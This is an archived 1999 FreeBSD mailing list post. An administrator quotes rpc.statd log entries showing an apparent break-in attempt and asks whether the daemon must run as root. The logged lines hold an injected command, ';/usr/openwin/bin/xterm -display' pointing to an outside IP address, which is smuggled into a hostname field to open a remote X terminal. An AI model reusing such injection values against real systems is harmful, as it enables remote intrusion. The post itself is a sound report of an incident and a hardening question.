Skip site navigation (1)Skip section navigation (2)
Date:      Sun, 21 Feb 1999 14:12:43 +1030
From:      Greg Lehey <grog@lemis.com>
To:        FreeBSD Hackers <hackers@freebsd.org>, FreeBSD-isp@freebsd.org
Subject:   New breakin technique?
Message-ID:  <19990221141243.G93492@lemis.com>

next in thread | raw e-mail | index | archive | help
I've just found the following messages in my logs:

Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;

Has anybody seen something like this?  It looks as if somebody is
trying to break in, but I didn't know that rpc.statd could start
xterms.

Under these circumstances, it would be interesting to know if
rpc.statd *must* run as root.  Wouldn't, say, bin be enough?

Greg
--
See complete headers for address, home page and phone numbers
finger grog@lemis.com for PGP public key


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990221141243.G93492>